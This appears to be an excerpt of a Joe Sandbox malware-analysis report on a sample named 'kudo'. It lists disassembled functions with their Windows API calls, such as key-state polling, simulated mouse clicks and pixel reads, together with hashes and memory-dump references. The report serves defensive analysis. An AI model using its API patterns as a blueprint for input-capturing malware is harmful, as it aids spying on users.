                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1389676194-0
                                                      • Opcode ID: 4b002d2149f240bdec8272f3a341b8145296ab55a8adaa5dd72c13e76c4508fd
                                                      • Instruction ID: 4eddc5fba38e0a60436b4acab752b9d1710d3c1c08dea3c6495c44b5ab6bb730
                                                      • Opcode Fuzzy Hash: 4b002d2149f240bdec8272f3a341b8145296ab55a8adaa5dd72c13e76c4508fd
                                                      • Instruction Fuzzy Hash: 1D51F879A00105DFCB41EF68C981AAABBF5FF09314B1480A5E949EB3A2CB31ED51DB51
                                                      Function 0088A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 94315e4625c95404833865b03e4b6e61954b85f45f6aa78a2ca26a8850b4ee97
                                                      • Instruction ID: 403e9c2d089aa4eda0b07298b21a53ba4c4f1609be251a895a3ed2f216004f04
                                                      • Opcode Fuzzy Hash: 94315e4625c95404833865b03e4b6e61954b85f45f6aa78a2ca26a8850b4ee97
                                                      • Instruction Fuzzy Hash: D941A539904504AFE728EF68CC8CFA9BBA8FB09310F150266F916E72E1D770AD51DB51
                                                      Function 00802344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00802357
                                                      • ScreenToClient.USER32(008C57B0,?), ref: 00802374
                                                      • GetAsyncKeyState.USER32(00000001), ref: 00802399
                                                      • GetAsyncKeyState.USER32(00000002), ref: 008023A7
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorScreen
                                                      • String ID:
                                                      • API String ID: 4210589936-0
                                                      • Opcode ID: 16c7976dcd6c52cce9ac275a8d4ad18ee608346650e54476e79782aba6c99f82
                                                      • Instruction ID: 73de9ef1542b966db812c3bba64699f751bd61463b829c093523fc1575b75de1
                                                      • Opcode Fuzzy Hash: 16c7976dcd6c52cce9ac275a8d4ad18ee608346650e54476e79782aba6c99f82
                                                      • Instruction Fuzzy Hash: E8418E75604119FBCF199F68CC48AE9BB74FB45364F20431AF828E22E1CB74A950DF91
                                                      Function 008563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008563E7
                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00856433
                                                      • TranslateMessage.USER32(?), ref: 0085645C
                                                      • DispatchMessageW.USER32(?), ref: 00856466
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00856475
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                      • String ID:
                                                      • API String ID: 2108273632-0
                                                      • Opcode ID: 05863a0ca65dad14a150aadc62f1986de9898840a74c56b98f12bab0b48d9052
                                                      • Instruction ID: 8e3907cd551dcbeb87bd811e3d01d8bae9cff225a02ff7fd11ea7bee90ef004f
                                                      • Opcode Fuzzy Hash: 05863a0ca65dad14a150aadc62f1986de9898840a74c56b98f12bab0b48d9052
                                                      • Instruction Fuzzy Hash: 7F317E31A00646AEDB64CFB4DC44FA67BB8FB01306F940165E921C35A1F735A8EDDBA4
                                                      Function 00858A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00858A30
                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00858ADA
                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00858AE2
                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00858AF0
                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00858AF8
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: 5a7952c534f17b7d813ae362315f83a8cb489f1c3116c342ca713ccb8b453800
                                                      • Instruction ID: 868e27c8b2bb2480a05904f23fe267368083de2c0752ed7d53a48a7eb77ed5da
                                                      • Opcode Fuzzy Hash: 5a7952c534f17b7d813ae362315f83a8cb489f1c3116c342ca713ccb8b453800
                                                      • Instruction Fuzzy Hash: 5831BF71500229EFDF14CFA8D94DA9E3BB5FB04316F10822AF925E71D1D7B09918DB91
                                                      Function 0085B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 0085B204
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0085B221
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0085B259
                                                      • CharUpperBuffW.USER32(00000000,00000000), ref: 0085B27F
                                                      • _wcsstr.LIBCMT ref: 0085B289
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                      • String ID:
                                                      • API String ID: 3902887630-0
                                                      • Opcode ID: 20f84cb4052ca553d92f39d52f3ea1208d011368a7bdcdcf6d3f4dd31268e59a
                                                      • Instruction ID: c1168932d84f64601e069d52673dbc61845ca165024d4accc2f0eeac70a0ba43
                                                      • Opcode Fuzzy Hash: 20f84cb4052ca553d92f39d52f3ea1208d011368a7bdcdcf6d3f4dd31268e59a
                                                      • Instruction Fuzzy Hash: 2E212531204214BAEB259B39AC09E7F7B98FF59721F104129FC04CA1A2EF61CC809760
                                                      Function 0088B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0088B192
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0088B1B7
                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0088B1CF
                                                      • GetSystemMetrics.USER32(00000004), ref: 0088B1F8
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047), ref: 0088B216
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$MetricsSystem
                                                      • String ID:
                                                      • API String ID: 2294984445-0
                                                      • Opcode ID: 5a4339f5e875394654fae7bf77262c45996851313291b7f4138dd31ce919f303
                                                      • Instruction ID: 8ba0e897a904182b942a938056317a8d7838ae83ec277cf549afe023a8bd4b3e
                                                      • Opcode Fuzzy Hash: 5a4339f5e875394654fae7bf77262c45996851313291b7f4138dd31ce919f303
                                                      • Instruction Fuzzy Hash: 1E21B271A10655AFCB20AF78DC18A6A3BA4FB55321F144738FD32D71E1E7309861CB90
                                                      Function 00859307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00859320
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00859352
                                                      • __itow.LIBCMT ref: 0085936A
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00859392
                                                      • __itow.LIBCMT ref: 008593A3
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$__itow$_memmove
                                                      • String ID:
                                                      • API String ID: 2983881199-0
                                                      • Opcode ID: 6c263dbc4926ba099bccc8cba0dc1eaa37ca4988c0db8982bd7586df90192e59
                                                      • Instruction ID: 8d5aea6465166369452de3110c56d8298706ed5fde78379c968957ca28a893db
                                                      • Opcode Fuzzy Hash: 6c263dbc4926ba099bccc8cba0dc1eaa37ca4988c0db8982bd7586df90192e59
                                                      • Instruction Fuzzy Hash: 4121F531B00208FBDB10AA688C89EEE7BACFB58711F045065FE84D73D1E6B09D498792
                                                      Function 00875A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 00875A6E
                                                      • GetForegroundWindow.USER32 ref: 00875A85
                                                      • GetDC.USER32(00000000), ref: 00875AC1
                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00875ACD
                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00875B08
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$ForegroundPixelRelease
                                                      • String ID:
                                                      • API String ID: 4156661090-0
                                                      • Opcode ID: c9e603921011496cb68437148ffaea157a5a6c263cf158c0fd9feb6499819ab1
                                                      • Instruction ID: e23e44190cb87cbd8350fd272b716da9251b648b9d1093b991ee663c30de7891
                                                      • Opcode Fuzzy Hash: c9e603921011496cb68437148ffaea157a5a6c263cf158c0fd9feb6499819ab1
                                                      • Instruction Fuzzy Hash: CE218B35A00214AFDB00EF68DC88AAABBE5FF48310F14C179E949D7362DA70EC00CB91
                                                      Function 008012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0080134D
                                                      • SelectObject.GDI32(?,00000000), ref: 0080135C
                                                      • BeginPath.GDI32(?), ref: 00801373
                                                      • SelectObject.GDI32(?,00000000), ref: 0080139C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: 6fa6d87119d05b5772691885158bf5a67ff449a29de55908621a6552049cd62b
                                                      • Instruction ID: ed435448e5cd4fa4c192e73fa53bcfd5a9e71dc319e4d5f14ba2091806b16a2d
                                                      • Opcode Fuzzy Hash: 6fa6d87119d05b5772691885158bf5a67ff449a29de55908621a6552049cd62b
                                                      • Instruction Fuzzy Hash: 25215930800A08EFDF119F29DC48B6A7BB8FB10761F644226F810D62F1DB74A891DF91
                                                      Function 00864A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00864ABA
                                                      • __beginthreadex.LIBCMT ref: 00864AD8
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00864AED
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00864B03
                                                      • CloseHandle.KERNEL32(00000000), ref: 00864B0A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                      • String ID:
                                                      • API String ID: 3824534824-0
                                                      • Opcode ID: e71b825053d185700046ad616e92195317b359dfb94caa0b713eca56bc65b52f
                                                      • Instruction ID: 96475fb852d78ba6919c082db01bd71daac94a89df80663e283a0346db916f0f
                                                      • Opcode Fuzzy Hash: e71b825053d185700046ad616e92195317b359dfb94caa0b713eca56bc65b52f
                                                      • Instruction Fuzzy Hash: E6114076908218BBCB018FACEC08E9F7FACFB45320F154269F925D32A1D674D9408BA0
                                                      Function 00858202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0085821E
                                                      • GetLastError.KERNEL32(?,00857CE2,?,?,?), ref: 00858228
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00857CE2,?,?,?), ref: 00858237
                                                      • RtlAllocateHeap.NTDLL(00000000,?,00857CE2), ref: 0085823E
                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00858255
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 883493501-0
                                                      • Opcode ID: 6a6e40900e2d41f920321a7ebcc3206eb3d3959d9d208970fd955efbfdd42d8f
                                                      • Instruction ID: d9ebd32212d901cd73cfba85be254bb4ff48d215bfa3135c85abc4680c10e7e3
                                                      • Opcode Fuzzy Hash: 6a6e40900e2d41f920321a7ebcc3206eb3d3959d9d208970fd955efbfdd42d8f
                                                      • Instruction Fuzzy Hash: 92014675200204EFDB208FAADC88D6B7FACFF9A756F50052AF909D2220DA318C14CB60
                                                      Function 0085710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CLSIDFromProgID.OLE32 ref: 00857127
                                                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 00857142
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857044,80070057,?,?), ref: 00857150
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00857160
                                                      • CLSIDFromString.OLE32(?,?), ref: 0085716C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: 426a562b8bbeefa3b4a5fa51bdd83c337fb4f25daf991da5a8988d73da87949d
                                                      • Instruction ID: b74576a230b12f65d6cbda314ac0e4bd79c9191ee4fffc2ed4a7023427958eff
                                                      • Opcode Fuzzy Hash: 426a562b8bbeefa3b4a5fa51bdd83c337fb4f25daf991da5a8988d73da87949d
                                                      • Instruction Fuzzy Hash: 2A018F72601619BBDB114F69EC44BAA7BADFF48792F148078FE04D2221EB31DD449BA0
                                                      Function 00865244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00865260
                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0086526E
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00865276
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00865280
                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008652BC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
